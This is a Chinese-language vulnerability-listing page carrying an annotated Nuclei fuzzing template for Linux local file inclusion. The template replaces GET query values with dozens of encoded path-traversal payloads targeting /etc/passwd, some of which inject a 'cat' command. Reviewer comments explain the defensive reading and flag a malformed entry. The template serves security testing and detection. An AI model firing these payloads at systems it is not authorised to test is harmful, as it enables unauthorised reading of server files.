linux-lfi-fuzz: Local File Inclusion - Linux

日期: 2025-08-01 | 影响软件: linux lfi fuzz | POC: 已公开

漏洞描述

PoC代码[已公开]

# Nuclei DAST fuzzing template. For requests whose method is GET it replaces
# query-parameter values with the nix_fuzz entries below and reports a finding
# when the response body matches the passwd-style regex under `matchers`.
# NOTE(review): the `# digest:` trailer that follows the template is a
# signature over the published text; an edited copy (added comments included)
# will presumably no longer verify - re-sign rather than reuse it. Confirm.
id: linux-lfi-fuzz

info:
  name: Local File Inclusion - Linux
  author: DhiyaneshDK
  severity: high
  reference:
    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/directory_traversal.txt
    - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
  metadata:
    # NOTE(review): 47 payload entries are listed below, and
    # '../../../etc/passwd' appears in both `low` and `medium`; confirm how
    # this count is derived.
    max-request: 46
  tags: lfi,dast,linux,vuln

http:
  # Gate: only requests whose method is GET are fuzzed.
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    # Candidate parameter values, all targeting /etc/passwd.
    # The low/medium/high keys presumably map to the scanner's fuzz
    # aggression levels - TODO confirm against the nuclei documentation.
    # Defensive reading: every entry is a differently encoded spelling of the
    # same path. Input handling that fully decodes, canonicalises, and then
    # checks that the resolved path stays inside the intended base directory
    # rejects all of them; filters that strip or match literal `../` do not.
    # The same substrings (`etc/passwd`, `%252e`, `%c0%ae`, `%00`) are
    # high-signal patterns in web access logs and WAF rules.
    payloads:
      nix_fuzz:
        # Plain absolute path and `../` traversal at several depths.
        low:
          - '/etc/passwd'
          - '../etc/passwd'
          - '../../etc/passwd'
          - '../../../etc/passwd'
          - '/../../../../etc/passwd'
          - '../../../../../../../../../etc/passwd'
          - '../../../../../../../../etc/passwd'
          - '../../../../../../../etc/passwd'
          - '../../../../../../etc/passwd'
          - '../../../../../etc/passwd'
        # Deeper traversal plus `%00` / `^^` suffixes, `/./` segments,
        # backslash and mixed separators, and one double-URL-encoded form.
        medium:
          - '../../../../etc/passwd'
          - '../../../etc/passwd'
          - '../../../etc/passwd%00'
          - '../../../../../../../../../../../../etc/passwd%00'
          - '../../../../../../../../../../../../etc/passwd'
          - '/../../../../../../../../../../etc/passwd^^'
          - '/../../../../../../../../../../etc/passwd'
          - '/./././././././././././etc/passwd'
          - '\..\..\..\..\..\..\..\..\..\..\etc\passwd'
          - '..\..\..\..\..\..\..\..\..\..\etc\passwd'
          - '/..\../..\../..\../..\../..\../..\../etc/passwd'
          - '.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd'
          - '\..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
          - '..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
          - '%252e%252e%252fetc%252fpasswd'
        # Encoding variants: `%c0%ae` / `%c0%af` byte sequences, `....//`,
        # repeated slashes, `%5C`, `%00` with a file-extension suffix,
        # `%2e%2e`, and /cgi-bin/ paths using `.%2e` and `.%%32%65`.
        high:
          - '%252e%252e%252fetc%252fpasswd%00'
          - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
          - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00'
          - '....//....//etc/passwd'
          - '..///////..////..//////etc/passwd'
          - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd'
          # Not a path: an encoded newline followed by a command string. A
          # match on this entry would point at command injection rather than
          # file inclusion, so triage it as a different defect class.
          - '%0a/bin/cat%20/etc/passwd'
          - '%00/etc/passwd%00'
          - '%00../../../../../../etc/passwd'
          - '/../../../../../../../../../../../etc/passwd%00.jpg'
          - '/../../../../../../../../../../../etc/passwd%00.html'
          - '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd'
          - '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
          # NOTE(review): as shown, this is not a valid single-quoted YAML
          # scalar (the quote after `\\` closes the string). It looks like an
          # HTML entity was decoded when the page was rendered; compare with
          # the upstream template before loading this copy.
          - '\\'/bin/cat%20/etc/passwd\\''
          - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
          - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
          - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
          - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
          - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
          - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
          - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
          - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'

    # Where the payloads go: the query string of the observed request.
    fuzzing:
      - part: query
        type: replace  # the existing parameter value is replaced by the payload
        mode: multiple  # every parameter's value is replaced, not one at a time
        fuzz:
          - '{{nix_fuzz}}'

    # Stops at the first payload that matches, so a finding names one payload,
    # not every variant the target accepts.
    stop-at-first-match: true
    # The only signal is a body regex for a root entry in passwd format. The
    # pattern is unanchored, so a page that merely echoes or documents such a
    # line also matches; confirm a hit against the full response before
    # treating it as file disclosure.
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'
# digest: 4b0a00483046022100bc2e34d998c161b0f1d7455850d0f9744628335ec5e3d0aeb95ac7711acaa2dd02210093950e9953cf175d3568ef5a82a366ec34486250941957176db44a0aafc24e1b:922c64590222798bb761d5b6d8e72950
